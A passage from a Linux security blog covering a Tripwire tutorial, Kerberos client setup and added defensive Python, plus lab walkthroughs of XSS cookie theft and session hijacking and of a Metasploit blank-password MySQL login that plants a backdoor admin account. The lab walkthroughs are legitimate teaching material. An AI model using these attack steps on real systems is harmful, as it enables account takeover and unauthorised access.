<a href="http://userscripts-mirror.org/scripts/show/119798" rel="nofollow">http://userscripts-mirror.org/scripts/show/119798</a><br />
<br />
<a href="http://dustint.com/post/12/cookie-injection-using-greasemonkey" rel="nofollow">http://dustint.com/post/12/cookie-injection-using-greasemonkey</a><br />
<br />
6.3) Copy the session token from 'Wireshark' output. Right click on <b>Request URI</b>. Select <b>Copy</b> -> <b>Bytes</b> -> <b>Printable Text Only</b>. Then paste into 'gedit' text editor as shown below:<br />
<br />
<span style="color: red;">/xss.php?c=PHPSESSID%3Dnef6vmd3ag8h7lo50m8190iee5</span><br />
<br />
6.4) Edit the copied text as shown below.<br />
<br />
<span style="color: red;">Cookie: PHPSESSID=nef6vmd3ag8h7lo50m8190iee5</span><br />
<br />
6.5) Copy the above line.<br />
<br />
6.6) Start Firefox web browser. Press <b>Alt+C</b> to open the Cookie Injector dialog. Paste the above copied line and click <b>OK</b> as shown below.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgrPblfz2tAxQflFOTWHan1jo6iqUSbICZLl-jd9d-Mo_bKhxoPmkojoOiMTP14uO5T6kZWUgC4ZiFpwTkTraJoSgIt8WljQiGtIN76fmJYCszOM9bTratS4OEQgDEzOkg-Obt_da7CBMO/s1600/Screenshot+from+2015-06-11+14%253A06%253A08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgrPblfz2tAxQflFOTWHan1jo6iqUSbICZLl-jd9d-Mo_bKhxoPmkojoOiMTP14uO5T6kZWUgC4ZiFpwTkTraJoSgIt8WljQiGtIN76fmJYCszOM9bTratS4OEQgDEzOkg-Obt_da7CBMO/s640/Screenshot+from+2015-06-11+14%253A06%253A08.png" width="640" /></a></div>
<br />
<br />
6.7) The session has been hijacked. The attacker accesses the URL <span style="color: red;">http://meru.mycompany.com/transfer.php</span> and transfers money from the victim's account.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIAR6ciMW0NYi6r3D5wkVnUrfHOqAF0rhSzma-yeTCWwjvJIZYNxqneEU33HofNzNPslz26vX-Zh-NDVwv9IRehnqnFzmHDjxn70ohKevS0lXkIV1HtnzTiIozyFGNZ_ZPJZeFXm7fzGEG/s1600/Screenshot+from+2015-06-11+14%253A07%253A28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="446" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIAR6ciMW0NYi6r3D5wkVnUrfHOqAF0rhSzma-yeTCWwjvJIZYNxqneEU33HofNzNPslz26vX-Zh-NDVwv9IRehnqnFzmHDjxn70ohKevS0lXkIV1HtnzTiIozyFGNZ_ZPJZeFXm7fzGEG/s640/Screenshot+from+2015-06-11+14%253A07%253A28.png" width="640" /></a></div>
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-90242114325854818972015-06-09T10:51:00.000+05:302015-06-21T21:36:17.193+05:30Host based IDS: Tripwire in RHEL7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
Host-based IDSes mainly rely on integrity checking. Integrity
checking involves the creation of a protected database of checksums,
hashes, and other attributes of a host's critical system files. The
integrity checker periodically checks those files against the database;
if a file has changed, an alert is logged. Both
Tripwire and AIDE are utilities used to monitor the integrity of files. They both create a secure, passphrase-protected database of file and
directory attributes that is compared against the current files
and directories to detect changes. If files being
monitored are modified in any way, Tripwire and AIDE will notify
administrators.<br />
<br />
We will install and configure tripwire on the following machine:<br />
<br />
Server name: <span style="color: red;">meru.mycompany.com</span> <br />
Server IP Address: 192.168.122.1<br />
<br />
Perform the following steps:<br />
<br />
1) <span style="color: blue;">Install tripwire.</span> <br />
1.1) Install EPEL repository. <br />
[root@server1 ~]# <b>yum install epel-release</b><br />
<br />
1.2) Install tripwire from the EPEL repository.<b> </b><br />
[root@meru ~]# <b>yum --disablerepo=\* --enablerepo=epel install tripwire</b><br />
<br />
<br />
2) <span style="color: blue;">Create site and local passphrase.</span> <br />
The site passphrase is used to encrypt and sign the Tripwire
configuration and policy files. The local passphrase is used to encrypt and sign Tripwire's databases and reports. <br />
<br />
2.1) Create site passphrase 'site.key'.<br />
[root@meru ~]# <b>cd /etc/tripwire/</b><br />
[root@meru tripwire]#<b> twadmin --generate-keys --site-keyfile site.key</b><br />
Enter the site keyfile passphrase: <br />
Verify the site keyfile passphrase:<br />
Generating key (this may take several minutes)...<br />
Key generation complete.<br />
<br />
<br />
2.2) Create local passphrase 'meru.mycompany.com-local.key'. (In our case $HOSTNAME will expand to 'meru.mycompany.com'.)<br />
[root@meru tripwire]#<b> twadmin --generate-keys --local-keyfile $HOSTNAME-local.key</b><br />
Enter the local keyfile passphrase:<br />
Verify the local keyfile passphrase:<br />
Generating key (this may take several minutes)...<br />
Key generation complete.<br />
<br />
<br />
2.3) View the generated passphrases. <br />
[root@meru tripwire]# <b>ls</b><br />
<span style="color: red;">meru.mycompany.com-local.key site.key</span> twcfg.txt twpol.txt<br />
<br />
<br />
3) <span style="color: blue;">View and edit</span> <span style="color: blue;">configuration and policy file.</span> <br />
The configuration file 'twcfg.txt' controls basic characteristics of tripwire's
environment and behavior. The Policy file 'twpol.txt' determines what tripwire looks
for and how it reacts.<br />
<br />
3.1) View configuration settings in clear text configuration file '<span style="color: red;">twcfg.txt'</span>.<br />
<br /><br />
3.2) View the clear text policy file '<span style="color: red;">twpol.txt'</span>.<br />
<br />A Tripwire policy is a sequence of two kinds of rules. Normal rules
define which properties of a file or directory tree must be checked,
in this format:<br />
<br />
<div class="programlisting" style="text-align: left;">
<span style="color: red;">object_name -> property_mask (attribute = value);
</span></div>
<br />
Where,<br />
<i>object_name</i> is the Tripwire term for files and directories. <br />
<br />
<i>property_mask</i> is a series of file or directory properties to examine or
ignore for a given object. There are a number of predefined variables that describe common property masks such as ReadOnly, Dynamic, Growing, IgnoreNone, Device. <br />
<br />
Attributes provide additional, rule-specific information. There are 4 attributes: rulename, severity, emailto, recurse. <br />
<br />
The other kind of rules are stop points, which define an exception to a rule (tell Tripwire not
to scan a particular file or directory). <br />
<br />
For example,<br />
<span style="color: red;">/home/shabbir/www -> $(ReadOnly) (recurse=1) ; </span><br />
<br />
tells Tripwire to treat the first level of my WWW directory as read-only. recurse=1 means to check the dir down one level (the dir itself plus everything immediately below, but no further).<br />
<br />
<span style="color: red;">!/home/shabbir/www/guestbook.html ;</span><br />
<br />
<span style="color: #444444;">is a stop point. It tells Tripwire to ignore changes to the file guestbook.html.</span><br />
<br />
<br />
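To make the policy grammar concrete, here is an added Python example (not Tripwire's own code) that parses rules of the form shown above, including recurse=1 and stop points, and then runs the same init / check cycle that steps 5 and 6 below perform with the real tool. It records a fixed set of properties (size, mode, sha256) instead of Tripwire's property masks, signs the baseline with an HMAC in place of the local key, and the directory tree and policy in demo() are constructed.<br />

```python
"""Tripwire-style integrity checking in miniature (added example, not Tripwire's code)."""
import hashlib
import hmac
import json
import os
import re
import tempfile

# Normal rule:  object_name -> $(property_mask) (attribute = value, ...) ;
# Stop point:   !object_name ;
RULE_RE = re.compile(r'^(?P<obj>\S+)\s*->\s*\$\((?P<mask>\w+)\)\s*(?:\((?P<attrs>[^)]*)\))?\s*;$')
STOP_RE = re.compile(r'^!(?P<obj>\S+)\s*;$')


def parse_policy(text):
    """Return (rules, stops); a rule is (path, mask, recurse) with -1 meaning unlimited depth."""
    rules, stops = [], set()
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        m = STOP_RE.match(line)
        if m:
            stops.add(m['obj'])
            continue
        m = RULE_RE.match(line)
        if not m:
            raise ValueError(f'unparseable policy line: {raw!r}')
        recurse = -1                       # Tripwire's default is full recursion
        for attr in (m['attrs'] or '').split(','):
            key, _, val = (s.strip() for s in attr.partition('='))
            if key == 'recurse':           # true = unlimited, false = the object only, N = depth
                recurse = -1 if val == 'true' else 0 if val == 'false' else int(val)
        rules.append((m['obj'], m['mask'], recurse))
    return rules, stops


def _props(path):
    """Properties recorded per object; a fixed set standing in for the property mask."""
    st = os.lstat(path)
    digest = ''
    if os.path.isfile(path) and not os.path.islink(path):
        with open(path, 'rb') as f:
            digest = hashlib.sha256(f.read()).hexdigest()
    return {'size': st.st_size, 'mode': oct(st.st_mode), 'sha256': digest}


def _covered(obj, recurse, stops):
    """Yield the objects one rule covers, honouring the recurse depth and stop points."""
    if obj in stops or not os.path.lexists(obj):
        return
    yield obj
    if recurse == 0 or os.path.islink(obj) or not os.path.isdir(obj):
        return
    for name in sorted(os.listdir(obj)):
        yield from _covered(os.path.join(obj, name), recurse if recurse < 0 else recurse - 1, stops)


def build_database(policy_text):
    """tripwire --init: snapshot every object the policy covers."""
    rules, stops = parse_policy(policy_text)
    return {p: _props(p) for obj, _mask, recurse in rules for p in _covered(obj, recurse, stops)}


def save_database(db, local_key):
    """Serialise and HMAC-sign the database (stands in for signing with the local key)."""
    body = json.dumps(db, sort_keys=True).encode()
    return hmac.new(local_key, body, hashlib.sha256).hexdigest().encode() + b'\n' + body


def load_database(blob, local_key):
    """Refuse a database whose signature does not verify."""
    tag, body = blob.split(b'\n', 1)
    expect = hmac.new(local_key, body, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(tag, expect):
        raise ValueError('database signature mismatch: tampered or wrong key')
    return json.loads(body)


def check(policy_text, db):
    """tripwire --check: compare the live file system against the signed baseline."""
    now = build_database(policy_text)
    return {
        'added': sorted(set(now) - set(db)),
        'deleted': sorted(set(db) - set(now)),
        'changed': sorted(p for p in set(db) & set(now) if db[p] != now[p]),
    }


def demo():
    """Constructed scenario mirroring the www example above: recurse=1 plus a stop point."""
    www = os.path.join(tempfile.mkdtemp(), 'www')
    os.makedirs(os.path.join(www, 'deep', 'deeper'))
    for rel in ('index.html', 'guestbook.html', 'deep/a.txt', 'deep/deeper/b.txt'):
        with open(os.path.join(www, rel), 'w') as f:
            f.write('original ' + rel)
    policy = f"{www} -> $(ReadOnly) (recurse=1) ;\n!{www}/guestbook.html ;\n"
    key = b'constructed-local-passphrase'
    blob = save_database(build_database(policy), key)
    # Tamper after the baseline: a covered file, a new file, the ignored guestbook,
    # and a file two levels down (outside recurse=1). Only the first two are reported.
    for rel, text in (('index.html', '<script>'), ('evil.php', 'x'),
                      ('guestbook.html', 'entry'), ('deep/deeper/b.txt', 'x')):
        with open(os.path.join(www, rel), 'a') as f:
            f.write(text)
    report = check(policy, load_database(blob, key))
    return {k: [os.path.relpath(p, www) for p in v] for k, v in report.items()}
```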
4) <span style="color: blue;">Encrypt configuration and policy files.</span><br />
<br />
4.1) Encrypt cleartext configuration file 'twcfg.txt' using the site key to create encrypted binary config file 'tw.cfg'.<br />
[root@meru tripwire]# <b>twadmin --create-cfgfile --site-keyfile ./site.key twcfg.txt </b><br />
Please enter your site passphrase: <br />
Wrote configuration file: <span style="color: red;">/etc/tripwire/tw.cfg</span><br />
<br />
4.2) Encrypt cleartext policy file 'twpol.txt' using the site key to create encrypted binary policy file 'tw.pol'.<br />
[root@meru tripwire]# <b>twadmin --create-polfile --site-keyfile ./site.key twpol.txt </b><br />
Please enter your site passphrase: <br />
Wrote policy file: <span style="color: red;">/etc/tripwire/tw.pol</span><br />
<br />
<br />
NOTE: The reason
why the two files must be encrypted is that Tripwire can detect far more easily whether they
have been corrupted than if they were in plain-text format. You should delete the plain-text versions after encrypting them. The plain-text versions can be retrieved later with the commands:<br />
<span style="color: red;">twadmin --print-cfgfile > twcfg.txt</span><br />
<span style="color: red;">twadmin --print-polfile > twpol.txt</span><br />
<br />
<br />
5) <span style="color: blue;">Create (Initialize) the Database.</span><br />
<span style="color: black;">Tripwire reads the policy file, generates a database based on its contents, and then cryptographically signs the resulting database. </span><span style="color: black;"><br /></span><br />
[root@meru tripwire]#<b> tripwire --init</b><br />
Wrote database file: <span style="color: red;">/var/lib/tripwire/meru.mycompany.com.twd</span><br />
The database was successfully generated.<br />
<br />
<br />
6) <span style="color: blue;">Run Periodic Checks.</span><br />
[root@meru tripwire]# <b>tripwire --check</b><br />
<br />
<br />
This compares all protected files against the hash database and prints a report both on the screen and to a binary file. The report will reside in '/var/lib/tripwire/report' with a time-date stamp appended to its filename. The report can be viewed later with the command<br />
[root@meru tripwire]# <b>twprint --print-report --report-level 4 --twrfile /var/lib/tripwire/report/meru.mycompany.com-</b><b>20150608-154127.twr </b><br />
<br />
<br />
The generated report describes each policy file violation in detail, depending on whether the specified file system object was added, deleted, or changed. Each report item lists the properties of the object as it currently resides on the file system, and, if appropriate, the old value stored in the database.<br />
<br />
If there are differences between the database and the current system, the administrator can either fix the problem by <span style="color: red;">replacing the current file with the correct file</span> (e.g., an intruder replaced /bin/login), or <span style="color: red;">update the database to reflect the new file</span> (e.g., a fellow system administrator installed a new version of /usr/local/bin/emacs).<br />
<br />
7) <span style="color: blue;">Updating Tripwire's database after violations.</span><span style="color: #444444;"> </span><br />
<span style="color: #444444;">Running tripwire in Database Update mode allows any differences between the database and the current system to be reconciled. This will prevent the violation from showing up in future reports. If the reported change is unexpected and potentially malicious, then the changed file should be replaced with the original version. If there is a valid reason for the change, the database must be changed to match the current files. </span><br />
<br />
[root@meru tripwire]# <b>tripwire --update --twrfile /var/lib/tripwire/report/meru.mycompany.com-20150608-154127.twr</b><br />
<br />
Remove the "x" from the adjacent box to prevent updating the database with the new values for this object.<br />
Added:<br />
[x] "/home/shabbir/www"<br />
<br />
NOTE: <span style="color: red;">If the change is legitimate, leave the 'x' there. If it isn't , delete the 'x'. </span><br />
<br />
The second way to update the database is to run the check in interactive mode, which starts the update session after the check finishes. <br />
[root@meru tripwire]# <b>tripwire --check --interactive</b><br />
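<br />
How the check and update steps fit together, as an added Python example (this is not Tripwire's code and not part of this post): a baseline database of file hashes is built, a check reports added, removed and changed entries, and an update reconciles only the entries the administrator accepted, so an unaccepted change keeps appearing in later reports. The sample file tree is constructed in a temporary directory, and the HMAC signature stands in for the local-key signature Tripwire puts on its .twd file.<br />

```python
"""Tripwire-style integrity check in miniature (added example, not Tripwire's own code)."""
import hashlib
import hmac
import json
import os
import shutil
import tempfile


def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_database(root):
    """The --init step: record hash, size and mode of every regular file under root."""
    db = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            st = os.stat(path)
            db[os.path.relpath(path, root)] = {
                "sha256": _sha256(path),
                "size": st.st_size,
                "mode": oct(st.st_mode & 0o7777),
            }
    return db


def check(root, db):
    """The --check step: compare the live tree with the database."""
    live = build_database(root)
    return {
        "added": sorted(set(live) - set(db)),
        "removed": sorted(set(db) - set(live)),
        "changed": sorted(p for p in set(live) & set(db) if live[p] != db[p]),
        "live": live,
    }


def update(db, report, accept):
    """The --update step: reconcile only the entries the administrator accepted
    (the ones left with their 'x'); everything else keeps its old database value
    and is reported again on the next check."""
    new_db = dict(db)
    for rel in report["added"] + report["changed"]:
        if rel in accept:
            new_db[rel] = report["live"][rel]
    for rel in report["removed"]:
        if rel in accept:
            del new_db[rel]
    return new_db


def sign_database(db, key):
    """Serialise and MAC the database so that hand-editing the stored copy is detected."""
    body = json.dumps(db, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return tag + b"\n" + body


def database_intact(blob, key):
    """Verify the MAC written by sign_database before trusting the stored database."""
    tag, body = blob.split(b"\n", 1)
    expected = hmac.new(key, body, hashlib.sha256).hexdigest().encode()
    return hmac.compare_digest(tag, expected)


def demo():
    """Constructed scenario: baseline, then one unexpected and one legitimate change."""
    root = tempfile.mkdtemp(prefix="twdemo-")
    try:
        for rel, data in {"bin/login": b"original login", "etc/motd": b"welcome"}.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        db = build_database(root)
        with open(os.path.join(root, "bin/login"), "wb") as f:  # unexpected: binary replaced
            f.write(b"trojaned login")
        with open(os.path.join(root, "etc/issue"), "wb") as f:  # expected: admin added a banner
            f.write(b"banner")
        first = check(root, db)
        db = update(db, first, accept={"etc/issue"})  # accept only the admin's change
        second = check(root, db)
        return first, second
    finally:
        shutil.rmtree(root)
```

In demo(), the first report lists etc/issue as added and bin/login as changed; after accepting only etc/issue, the second report still flags bin/login, which is exactly the behaviour the 'x' boxes in the update session give you.<br />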
<br />
<br />
8) <span style="color: blue;">Changing Tripwire's Policy.</span><br />
The <i>twadmin</i> command should be used to install only the initial policy, not updated policies. If you need to change your tripwire policy after the database has been initialized (i.e. after you've run tripwire --init), use the commands below to dump, edit and install it again.<br />
<br />
8.1) Generate the plain text version <br />
[root@meru tripwire]# <b>twadmin --print-polfile > twpol.txt</b><br />
<br />
8.2) Edit the plain text policy file<br />
[root@meru tripwire]# <b>vi twpol.txt </b><br />
<br />
8.3) Install the updated policy <br />
[root@meru tripwire]# <b>tripwire --update-policy twpol.txt <br /> </b><br />
Tripwire will parse the policy file, generate a new database, and compare all records that the new and old database have in common. If any of the common records don't match, tripwire will not update the database or the policy. <span style="color: red;">You will need to run a tripwire --check followed by --update (or --check --interactive). Then run the policy update again. </span><br />
<br />
<br />
9) <span style="color: blue;">Run automatic checking.</span><br />
A cron job has already been set up. The tripwire RPM installs the script
'/etc/cron.daily/tripwire-chec'. Tripwire will perform an
integrity check once every day, and the generated report will be
emailed to root.<br />
<br />
</div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com1tag:blogger.com,1999:blog-1164086323266606043.post-42421105112613499362015-06-07T11:18:00.000+05:302015-06-20T22:01:44.485+05:30Metasploitable2 : Hack MySQL Server using Metasploit in Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
The Metasploitable virtual machine is an intentionally vulnerable
version of Ubuntu Linux designed for testing security tools and
demonstrating common vulnerabilities. This virtual machine is compatible
with VMWare, VirtualBox, and other common virtualization platforms.<br />
<br />
We have installed 'Metasploitable 2' and Kali Linux as Virtual Machines in KVM in CentOS7. <span style="color: black;">For Instructions on how to install Metasploitable 2 Virtual Machine in KVM</span>, refer to this <a href="http://linux-hacking-guide.blogspot.in/2015/05/convert-vmware-virtual-machine-to-kvm.html" target="_blank">post.</a><br />
<br />
In a <a href="http://linux-hacking-guide.blogspot.in/2015/05/metasploitable2-vulnerability-scanning.html" target="_blank">previous post</a>,
we carried out a Vulnerability Scan of the 'Metasploitable 2'
virtual machine using OpenVAS in Kali Linux. <br />
<br />
In this post, we will hack MySQL Server using Metasploit in Kali Linux. <br />
<br />
We have the following scenario:<br />
<br />
Metasploitable2 IP Address: 192.168.122.74<br />
Kali Linux IP Address: 192.168.122.115 <br />
<br />
Perform the following steps on the Kali Linux machine:<br />
<br />
1) We perform a port scan on the Metasploitable machine and see that the mysql port is open.<br />
root@kali:~# <b>nmap -p 3306 192.168.122.74</b><br />
<br />
Starting Nmap 6.47 ( http://nmap.org ) at 2015-06-07 11:09 IST<br />
Nmap scan report for 192.168.122.74<br />
Host is up (0.00062s latency).<br />
PORT STATE SERVICE<br />
<span style="color: red;">3306/tcp open mysql</span><br />
MAC Address: 00:0C:29:FA:DD:2A (VMware)<br />
<br />
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds<br />
<br />
<br />
<br />
2) We will try to hack the password for 'root' user. We will try blank password and see if it works.<br />
<br />
root@kali:~# <b>msfconsole</b><br />
<br />
msf > <b>search mysql</b><br />
<br />
msf > <b>use auxiliary/scanner/mysql/mysql_login </b><br />
msf auxiliary(mysql_login) > <b>show options</b><br />
Module options (auxiliary/scanner/mysql/mysql_login):<br />
<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
<span style="color: red;">BLANK_PASSWORDS false no Try blank passwords for all users</span><br />
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5<br />
DB_ALL_CREDS false no Try each user/password couple stored in the current database<br />
DB_ALL_PASS false no Add all passwords in the current database to the list<br />
DB_ALL_USERS false no Add all users in the current database to the list<br />
PASSWORD no A specific password to authenticate with<br />
PASS_FILE no File containing passwords, one per line<br />
Proxies no A proxy chain of format type:host:port[,type:host:port][...]<br />
<span style="color: red;"> RHOSTS yes The target address range or CIDR identifier</span><br />
RPORT 3306 yes The target port<br />
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host<br />
THREADS 1 yes The number of concurrent threads<br />
<span style="color: red;"> USERNAME no A specific username to authenticate as</span><br />
USERPASS_FILE no File containing users and passwords separated by space, one pair per line<br />
USER_AS_PASS false no Try the username as the password for all users<br />
USER_FILE no File containing usernames, one per line<br />
VERBOSE true yes Whether to print output for all attempts<br />
<br />
msf auxiliary(mysql_login) > <b>set RHOSTS 192.168.122.74</b><br />
RHOSTS => 192.168.122.74<br />
msf auxiliary(mysql_login) > <b>set USERNAME root</b><br />
USERNAME => root<br />
msf auxiliary(mysql_login) > <b>set BLANK_PASSWORDS true</b><br />
BLANK_PASSWORDS => true<br />
msf auxiliary(mysql_login) > <b>exploit</b><br />
<br />
[*] 192.168.122.74:3306 MYSQL - Found remote MySQL version 5.0.51a<br />
[!] No active DB -- Credential data will not be saved!<br />
[!] No active DB -- Credential data will not be saved!<br />
<span style="color: red;">[+] 192.168.122.74:3306 MYSQL - Success: 'root:'</span><br />
[*] Scanned 1 of 1 hosts (100% complete)<br />
[*] Auxiliary module execution completed<br />
msf auxiliary(mysql_login) > <b>quit</b><br />
root@kali:~#<br />
<br />
<br />
3) We are lucky. Now we will log in to the mysql server with user 'root' and blank password.<br />
<br />
root@kali:~# <b>mysql -u root -h 192.168.122.74</b><br />
<br />
<br />
4) We create a user 'shabbir' with password 'shabbir' having full administrative privileges on the MySQL server (all databases).<br />
<br />
mysql> <b>grant all on *.* to shabbir@192.168.122.115 identified by 'shabbir';</b><br />
Query OK, 0 rows affected (0.00 sec)<br />
<br />
mysql> <b>quit</b><br />
Bye<br />
<br />
<br />
5) We can now log in to the MySQL server whenever we want with username 'shabbir' and password 'shabbir' and have full administrative access.<br />
<br />
root@kali:~# <b>mysql -u shabbir -h 192.168.122.74 -p</b><br />
Enter password:<br />
<br />
mysql> <b>show databases;</b><br />
+--------------------+<br />
| Database |<br />
+--------------------+<br />
| information_schema |<br />
| dvwa |<br />
| metasploit |<br />
| mysql |<br />
| owasp10 |<br />
| tikiwiki |<br />
| tikiwiki195 |<br />
+--------------------+<br />
7 rows in set (0.00 sec)<br />
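<br />
Seen from the defending side, the two weaknesses used above are a root account with no password and a new ALL PRIVILEGES account that nobody reviewed. The following added Python example (not from this post and not part of Metasploitable or Metasploit) audits rows in the shape of <b>SELECT User, Host, Password, Super_priv, Grant_priv FROM mysql.user</b> on a MySQL 5.0/5.1 server and emits the remediation statements for an administrator to review. The rows, the hash placeholders and the allow-list of expected accounts are constructed.<br />

```python
from dataclasses import dataclass


@dataclass
class Account:
    user: str
    host: str
    password: str    # mysql.user.Password as stored (a hash); '' means no password is set
    super_priv: str  # 'Y' or 'N'
    grant_priv: str  # 'Y' or 'N'


# Constructed rows in the shape of
#   SELECT User, Host, Password, Super_priv, Grant_priv FROM mysql.user;
# on a MySQL 5.0/5.1 server, tab separated as `mysql -B` prints them.
SAMPLE_ROWS = (
    "root\tlocalhost\t\tY\tY\n"                                # root, no password
    "root\t%\t\tY\tY\n"                                        # root from any host, no password
    "\tlocalhost\t\tN\tN\n"                                    # anonymous account
    "shabbir\t192.168.122.115\t*CONSTRUCTED_HASH_1\tY\tY\n"    # unreviewed ALL PRIVILEGES account
    "backup\t10.0.0.%\t*CONSTRUCTED_HASH_2\tN\tN\n"            # documented service account
)

# Accounts the administrator knows about (constructed allow-list).
EXPECTED = {("root", "localhost"), ("backup", "10.0.0.%")}

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_rows(text):
    """Turn the tab-separated query output into Account records."""
    accounts = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t")
        if len(fields) != 5:
            raise ValueError(f"expected 5 tab-separated fields: {line!r}")
        accounts.append(Account(*fields))
    return accounts


def audit(accounts, expected):
    """Return (kind, account, remediation SQL) findings for every risky row."""
    findings = []
    for a in accounts:
        who = f"'{a.user}'@'{a.host}'"
        if a.user == "":
            findings.append(("ANONYMOUS_ACCOUNT", who, f"DROP USER {who};"))
            continue
        if a.password == "":
            findings.append(("EMPTY_PASSWORD", who,
                             f"SET PASSWORD FOR {who} = PASSWORD('<new strong password>');"))
        if a.host not in LOCAL_HOSTS and "Y" in (a.super_priv, a.grant_priv):
            findings.append(("REMOTE_SUPERUSER", who,
                             f"REVOKE ALL PRIVILEGES, GRANT OPTION FROM {who};"))
        if (a.user, a.host) not in expected:
            findings.append(("UNEXPECTED_ACCOUNT", who,
                             f"-- confirm with the owner, then: DROP USER {who};"))
    return findings


def remediation_script(findings):
    """One statement per line, annotated with the finding, for review before it is run.
    If the server never needs remote clients, also set bind-address=127.0.0.1 in my.cnf."""
    return "\n".join(f"{fix}  -- {kind} {who}" for kind, who, fix in findings)
```

On the constructed rows the audit produces seven findings: two empty passwords, two remotely reachable superuser accounts, one anonymous account and two accounts outside the allow-list; the backup account passes because it is documented and holds no administrative privilege.<br />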
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com2tag:blogger.com,1999:blog-1164086323266606043.post-34258422854244139202015-06-06T14:53:00.000+05:302015-06-21T21:36:17.143+05:30Configure Kerberos Authentication in RHEL7<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
In this tutorial, we will configure a client machine to use Kerberos authentication. We will use a LDAP server for user information. <br />
<br />
For Kerberos Server configuration, refer to this <span id="goog_1209312757"></span><a href="http://linux-hacking-guide.blogspot.in/2015/04/kerberos-configuration-in-rhel7centos7.html" target="_blank">post<span id="goog_1209312758"></span></a>. For LDAP Server configuration, refer to this <a href="http://linux-hacking-guide.blogspot.in/2015/04/ldap-authentication-server-in-rhel7.html" target="_blank">post</a>.<br />
<br />
We use the System Security Services Daemon (SSSD) for user information
services and authentication, instead of the legacy services.<br />
<br />
We use the authconfig tool for authentication configuration. <br />
If the <span style="color: red;">--test</span> action is specified,
authconfig just reads the current settings from the various
configuration files and prints their values. If the <span style="color: red;">--update</span> action is specified, authconfig must be run by root, and the configuration changes are saved.<br />
<br />
Each <span style="color: red;">--enable</span> has a matching <span style="color: blue;"><span style="color: red;">--disable</span> </span>option that disables the service if it is already enabled. <br />
<br />
Consider the following scenario:<br />
<br />
Kerberos Realm: MYCOMPANY.COM<br />
Kerberos Server: meru.mycompany.com<br />
<br />
LDAP Server: oserver1.mycompany.com<br />
LDAP Base DN: dc=my-domain,dc=com<br />
<br />
Client Machine: server2.mycompany.com <br />
<br />
NOTE: 1) Ensure that time synchronization is maintained between all the machines. Kerberos requires accurate time synchronization to work properly. <br />
2) Ensure that host name resolution is working. Configure DNS Server or /etc/hosts.<br />
<br />
Perform the following steps on the client machine:<br />
<br />
1) Install packages<br />
[root@server2 ~]# <b>yum install sssd* openldap-clients pam_krb5 krb5-workstation </b><br />
<br />
2) Configure LDAP<br />
[root@server2 ~]# <b>authconfig --enableldap --ldapserver="ldap://oserver1.mycompany.com:389" --ldapbasedn="dc=my-domain,dc=com" --update</b><br />
<br />
Where, <br />
<span style="color: red;">--enableldap</span> -> Use LDAP as an Identity Store. Configures user information services in /etc/nsswitch.conf. <br />
<br />
<span style="color: red;">--ldapserver="ldap://oserver1.mycompany.com:389" <span style="color: black;">-> The URL of the LDAP Server. </span></span><span style="color: red;"><span style="color: black;">This usually requires both the host name and port number of the LDAP server.</span></span><br />
<br />
<span style="color: red;">--ldapbasedn="dc=my-domain,dc=com"</span> -> gives the root suffix or <span class="emphasis"><i>distinguished name</i></span> (DN) for the user directory. All of the user entries will exist below this parent entry.<br />
<br />
<br />
3) Test connection to LDAP server. We assume that an entry for user 'katrina' is present in the LDAP database.<br />
[root@server2 ~]# <b>ldapsearch '(uid=katrina)'</b><br />
<br />
<br />
4) Configure Kerberos<br />
[root@server2 ~]# <b>authconfig --enablekrb5 --krb5realm MYCOMPANY.COM --krb5kdc meru.mycompany.com --krb5adminserver meru.mycompany.com --update</b><br />
<br />
Where, <br />
<span style="color: red;">--enablekrb5</span> -> Enable Kerberos authentication. <br />
<br />
--<span style="color: red;">krb5realm MYCOMPANY.COM</span> -> Kerberos realm <br />
<br />
--<span style="color: red;">krb5kdc meru.mycompany.com</span> -> Host name of the Kerberos KDC Server<br />
<br />
--<span style="color: red;">krb5adminserver meru.mycompany.com</span> -> Host name of the Kerberos admin server<br />
<br />
<br />
5) Create user principal for 'katrina' in Kerberos database.<br />
[root@server2 ~]# <b>kadmin -p shabbir/admin -w shabbir</b><br />
Authenticating as principal shabbir/admin with password.<br />
kadmin: <b>add_principal katrina</b><br />
WARNING: no policy specified for katrina@MYCOMPANY.COM; defaulting to no policy<br />
Enter password for principal "katrina@MYCOMPANY.COM": <br />
Re-enter password for principal "katrina@MYCOMPANY.COM": <br />
Principal "katrina@MYCOMPANY.COM" created.<br />
<br />
6) Verify Kerberos Operation<br />
[root@server2 ~]# <b>kinit katrina </b><br />
<b> </b>Password for katrina@MYCOMPANY.COM: <br />
<br />
[root@server2 ~]# <b>klist</b><br />
Ticket cache: KEYRING:persistent:0:0<br />
Default principal: <span style="color: red;">katrina@MYCOMPANY.COM</span><br />
